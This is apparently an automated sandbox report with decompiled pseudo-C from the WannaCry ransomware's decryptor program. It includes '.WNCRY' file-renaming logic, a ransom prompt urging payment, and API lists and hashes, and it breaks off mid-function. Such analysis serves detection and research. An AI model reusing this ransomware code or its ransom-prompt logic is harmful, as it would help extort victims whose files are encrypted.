                                  				int _t48;
                                  				void* _t51;
                                  
                                  				_t35 = __ecx;
                                  				_t48 = 0;
                                  				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
                                  				_t47 = _t28;
                                  				_v96 = 0;
                                  				_v92 = _t47;
                                  				_t4 = _t47 + 1; // 0x1
                                  				L00412CEC();
                                  				_t51 =  &_v104 + 4;
                                  				_v88 = _t28;
                                  				if(_t28 == 0) {
                                  					return _t28;
                                  				}
                                  				_t29 = _t35 + 0x4c0;
                                  				if(_t29 != 0) {
                                  					_t30 =  *(_t29 + 0x20);
                                  				} else {
                                  					_t30 = 0;
                                  				}
                                  				SendMessageA(_t30, 0x44b, _t48,  &_v96);
                                  				_t32 = _v88;
                                  				 *((char*)(_t32 + _t47)) = 0;
                                  				if(_t47 < 0) {
                                  					L15:
                                  					_push(_v88);
                                  					L00412C98();
                                  					return _t32;
                                  				} else {
                                  					do {
                                  						__imp___strnicmp(_t48 + _v88, "<http://", 8);
                                  						_t51 = _t51 + 0xc;
                                  						if(_t32 == 0) {
                                  							L7:
                                  							_t48 = _t48 + 1;
                                  							_t39 = _t48;
                                  							if(_t48 > _t47) {
                                  								goto L14;
                                  							}
                                  							_t32 = _v88;
                                  							while( *((char*)(_t48 + _t32)) != 0x3e) {
                                  								_t48 = _t48 + 1;
                                  								if(_t48 <= _t47) {
                                  									continue;
                                  								}
                                  								goto L14;
                                  							}
                                  							_t32 = _t48;
                                  							_t48 = _t48 + 1;
                                  							if(_t32 != 0xffffffff) {
                                  								_v100 = _t32;
                                  								_v104 = _t39;
                                  								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
                                  								_t32 = 0x20;
                                  								_push( &_v84);
                                  								_v84 = 0x54;
                                  								_v76 = 0x20;
                                  								_v80 = 0x20;
                                  								L00412F4A();
                                  							}
                                  							goto L14;
                                  						}
                                  						_t32 = _v88;
                                  						__imp___strnicmp(_t48 + _t32, "<https://", 9);
                                  						_t51 = _t51 + 0xc;
                                  						if(_t32 != 0) {
                                  							goto L14;
                                  						}
                                  						goto L7;
                                  						L14:
                                  						_t48 = _t48 + 1;
                                  					} while (_t48 <= _t47);
                                  					goto L15;
                                  				}
                                  			}





















                                  APIs
                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                  • #823.MFC42(00000001,?,?), ref: 00406DEC
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                  • _strnicmp.MSVCRT ref: 00406E3E
                                  • _strnicmp.MSVCRT ref: 00406E5A
                                  • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                  • #6136.MFC42 ref: 00406EC4
                                  • #825.MFC42(?), ref: 00406ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$_strnicmp$#6136#823#825
                                  • String ID: <http://$<https://$T
                                  • API String ID: 1228111698-1216084165
                                  • Opcode ID: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                  • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                  • Opcode Fuzzy Hash: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                  • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00402560(intOrPtr __ecx, WCHAR* _a4) {
                                  				short _v720;
                                  				intOrPtr _v724;
                                  				void* _t21;
                                  				void* _t22;
                                  				WCHAR* _t23;
                                  				void* _t30;
                                  				short* _t31;
                                  				intOrPtr* _t32;
                                  				void* _t34;
                                  				void* _t36;
                                  
                                  				_t23 = _a4;
                                  				_v724 = __ecx;
                                  				_t30 = 0;
                                  				wcscpy( &_v720, _t23);
                                  				_t31 = wcsrchr( &_v720, 0x2e);
                                  				_t34 =  &_v724 + 0x10;
                                  				if(_t31 == 0) {
                                  					L4:
                                  					wcscat( &_v720, L".org");
                                  				} else {
                                  					_t32 = __imp___wcsicmp;
                                  					_t21 =  *_t32(_t31, L".WNCRY");
                                  					_t36 = _t34 + 8;
                                  					if(_t21 == 0) {
                                  						L3:
                                  						 *_t31 = 0;
                                  						_t30 = 1;
                                  					} else {
                                  						_t22 =  *_t32(_t31, L".WNCYR");
                                  						_t34 = _t36 + 8;
                                  						if(_t22 != 0) {
                                  							goto L4;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				if(E004020A0(_v724, _t23,  &_v720) == 0) {
                                  					DeleteFileW( &_v720);
                                  					goto L11;
                                  				} else {
                                  					if(DeleteFileW(_t23) == 0) {
                                  						L11:
                                  						return 0;
                                  					} else {
                                  						if(_t30 != 0) {
                                  							return 1;
                                  						} else {
                                  							return MoveFileW( &_v720, _t23);
                                  						}
                                  					}
                                  				}
                                  			}














                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                  • String ID: .WNCRY$.WNCYR$.org
                                  • API String ID: 1016768320-4283512309
                                  • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                  • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t23;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				void _t29;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t55;
                                  				intOrPtr _t58;
                                  				intOrPtr _t61;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x41baa8);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_v28 = _t58 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x422298 =  *0x422298 | 0xffffffff;
                                  				 *0x42229c =  *0x42229c | 0xffffffff;
                                  				_t23 = __p__fmode();
                                  				_t46 =  *0x42228c; // 0x0
                                  				 *_t23 = _t46;
                                  				_t24 = __p__commode();
                                  				_t47 =  *0x422288; // 0x0
                                  				 *_t24 = _t47;
                                  				 *0x422294 = _adjust_fdiv;
                                  				_t27 = E004133C7( *_adjust_fdiv);
                                  				_t61 =  *0x421790; // 0x1
                                  				if(_t61 == 0) {
                                  					__setusermatherr(E004133C4);
                                  				}
                                  				E004133B2(_t27);
                                  				_push(0x41f018);
                                  				_push(0x41f014);
                                  				L004133AC();
                                  				_t29 =  *0x422284; // 0x0
                                  				_v112 = _t29;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
                                  				_push(0x41f010);
                                  				_push(0x41f000);
                                  				L004133AC();
                                  				_t55 =  *_acmdln;
                                  				_v120 = _t55;
                                  				if( *_t55 != 0x22) {
                                  					while( *_t55 > 0x20) {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  						_t42 =  *_t55;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t55 == 0x22) {
                                  						L6:
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				}
                                  				_t36 =  *_t55;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                  				_v108 = _t40;
                                  				exit(_t40);
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L004133A6();
                                  				return _t41;
                                  			}






























                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                  • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00404280(void* __ecx, char _a8) {
                                  				void* _t9;
                                  				struct HWND__* _t10;
                                  				long _t12;
                                  				long* _t22;
                                  				void* _t24;
                                  
                                  				_t24 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                  					E00404530(__ecx);
                                  				}
                                  				_t9 = E004045E0(_t24,  &_a8);
                                  				if(_t9 == 0) {
                                  					L6:
                                  					L00412CBC();
                                  					return _t9;
                                  				} else {
                                  					_t22 = _t24 + 0x44;
                                  					_push(0);
                                  					_push("mailto:");
                                  					L00412DB2();
                                  					if(_t9 != 0) {
                                  						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
                                  						goto L6;
                                  					} else {
                                  						_t10 = GetParent( *(_t24 + 0x20));
                                  						_push(_t10);
                                  						L00412DAC();
                                  						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
                                  						L00412CBC();
                                  						return _t12;
                                  					}
                                  				}
                                  			}









                                  APIs
                                  • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                  • GetParent.USER32(?), ref: 004042BB
                                  • #2864.MFC42(00000000), ref: 004042C2
                                  • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                  • #2379.MFC42 ref: 004042DD
                                    • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                    • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                    • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                    • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                    • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                  • #2379.MFC42(?), ref: 004042FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                  • String ID: mailto:$open
                                  • API String ID: 1144735033-2326261162
                                  • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                  • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004038F0(void* __ecx, void* __ebp) {
                                  				long _v4;
                                  				intOrPtr _v16;
                                  				char _v1252;
                                  				char _v1284;
                                  				void* __edi;
                                  				int _t20;
                                  				int _t23;
                                  				void* _t30;
                                  				long _t48;
                                  				void* _t50;
                                  				intOrPtr _t53;
                                  				void* _t54;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041367B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t53;
                                  				_t54 = _t53 - 0x4f8;
                                  				_t50 = __ecx;
                                  				E00403EB0( *[fs:0x0], __ecx, 0);
                                  				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
                                  				if(_t20 != 0xffffffff) {
                                  					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
                                  					_t57 =  *((intOrPtr*)(_t48 + 8));
                                  					if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                  						E00403AF0(_t48, __ebp);
                                  					}
                                  					E00401E90( &_v1252, _t57);
                                  					_v4 = 0;
                                  					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
                                  					_t54 = _t54 + 0xc;
                                  					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
                                  						_t30 = E00403A20( &_v1252, _t48);
                                  						__eflags = _t30;
                                  						if(_t30 != 0) {
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("All your files have been decrypted!");
                                  							goto L8;
                                  						}
                                  					} else {
                                  						if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("Pay now, if you want to decrypt ALL your files!");
                                  							L8:
                                  							L00412CC8();
                                  						}
                                  					}
                                  					_v4 = 0xffffffff;
                                  					_t20 = E00401F30( &_v1252);
                                  				}
                                  				E00403EB0(_t20, _t50, 1);
                                  				_t23 = CloseHandle( *(_t50 + 0xf4));
                                  				 *(_t50 + 0xf4) = 0;
                                  				 *[fs:0x0] = _v16;
                                  				return _t23;
                                  			}

                                  APIs
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                  • sprintf.MSVCRT ref: 0040397A
                                  • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                    • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                    • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                    • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                    • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                  Strings
                                  • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                  • %08X.dky, xrefs: 00403969
                                  • All your files have been decrypted!, xrefs: 004039C3
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                  • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                  • API String ID: 139182656-2046724789
                                  • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                  • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00404090(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t16;
                                  				intOrPtr _t34;
                                  				intOrPtr _t39;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413739);
                                  				_t16 =  *[fs:0x0];
                                  				_push(_t16);
                                  				 *[fs:0x0] = _t39;
                                  				_push(__ecx);
                                  				_t34 = __ecx;
                                  				_v16 = __ecx;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx)) = 0x415d70;
                                  				_v4 = 0;
                                  				L00412DA6();
                                  				_v4 = 1;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v4 = 3;
                                  				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                  				L00412DA0();
                                  				_push(_t16);
                                  				L00412D9A();
                                  				 *((char*)(__ecx + 0x5a)) = 0;
                                  				 *((char*)(__ecx + 0x58)) = 0;
                                  				 *((char*)(__ecx + 0x59)) = 0;
                                  				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
                                  				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
                                  				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
                                  				 *[fs:0x0] = _v20;
                                  				return _t34;
                                  			}

                                  APIs
                                  • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                  • #860.MFC42(00421798), ref: 004040F6
                                  • #858.MFC42(00000000,00421798), ref: 004040FE
                                  • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540CursorLoad$#567#858#860
                                  • String ID: 0ZA
                                  • API String ID: 2440951079-2594568282
                                  • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                  • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00407CB0() {
                                  				char _v8;
                                  				intOrPtr _v16;
                                  				char _v28;
                                  				char _v40;
                                  				void* _v104;
                                  				void* _v168;
                                  				char _v260;
                                  				void* _v264;
                                  				char* _t24;
                                  				intOrPtr _t34;
                                  				intOrPtr* _t35;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413F77);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t34;
                                  				_t35 = _t34 - 0xfc;
                                  				E004030E0( &_v260, 0);
                                  				_v8 = 0;
                                  				L00412B72();
                                  				_v8 = 1;
                                  				_t24 =  &_v28;
                                  				_v28 = 0x415c00;
                                  				 *_t35 = _t24;
                                  				_v8 = 5;
                                  				L00412D52();
                                  				_v28 = 0x415bec;
                                  				 *_t35 =  &_v40;
                                  				_v40 = 0x415c00;
                                  				_v8 = 6;
                                  				L00412D52();
                                  				_v40 = 0x415bec;
                                  				_v8 = 2;
                                  				L00412D4C();
                                  				_v8 = 1;
                                  				L00412D3A();
                                  				_v8 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v16;
                                  				return _t24;
                                  			}

                                  APIs
                                    • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  • #2514.MFC42 ref: 00407CE5
                                  • #2414.MFC42 ref: 00407D1A
                                  • #2414.MFC42 ref: 00407D4F
                                  • #616.MFC42 ref: 00407D6E
                                  • #693.MFC42 ref: 00407D7F
                                  • #641.MFC42 ref: 00407D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#567$#2514#324#616#641#693
                                  • String ID: [A$[A
                                  • API String ID: 3779294304-353784214
                                  • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                  • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
                                  				char _v0;
                                  				char _v4;
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v32;
                                  				char _v34;
                                  				long _v36;
                                  				char _v40;
                                  				char _v48;
                                  				char _v56;
                                  				char _v64;
                                  				char _v65;
                                  				char _v68;
                                  				int _v76;
                                  				char _v77;
                                  				void* _t57;
                                  				intOrPtr* _t68;
                                  				signed int _t76;
                                  				struct HWND__* _t92;
                                  				intOrPtr* _t113;
                                  				intOrPtr* _t114;
                                  				intOrPtr* _t118;
                                  				intOrPtr* _t120;
                                  				long _t133;
                                  				struct _IO_FILE* _t136;
                                  				struct HWND__* _t138;
                                  				signed int _t140;
                                  				int _t141;
                                  				intOrPtr _t143;
                                  				void* _t144;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004142DB);
                                  				 *[fs:0x0] = _t143;
                                  				E00413060(0x240c, __ecx,  *[fs:0x0]);
                                  				_push(_t140);
                                  				E0040DBB0( &_v0, 0x1000);
                                  				_a9220 = 0;
                                  				_push( &_v4);
                                  				_t141 = _t140 | 0xffffffff;
                                  				_t57 = E0040BED0(_a9228, _a9232, 0xc);
                                  				_t144 = _t143 + 0x10;
                                  				if(_t57 == 0) {
                                  					_t138 = _a9272;
                                  					if(_t138 != 0) {
                                  						SendMessageA(_t138, 0x4e20, 0, 0);
                                  					}
                                  					_push(8);
                                  					_push(_a9240);
                                  					E0040DC00( &_v0);
                                  					_v12 = _a9236;
                                  					_push(4);
                                  					_push( &_v12);
                                  					E0040DC00( &_v8);
                                  					E0040DD00( &_v16, _a9240);
                                  					E0040DD00( &_v20, _a9240);
                                  					_push(1);
                                  					_push( &_v34);
                                  					_v34 = _a9240;
                                  					E0040DC00( &_v24);
                                  					_t133 = _a9220;
                                  					_push(4);
                                  					_push( &_v36);
                                  					_v36 = _t133;
                                  					E0040DC00( &_v32);
                                  					_push(_t133);
                                  					_push(_a9208);
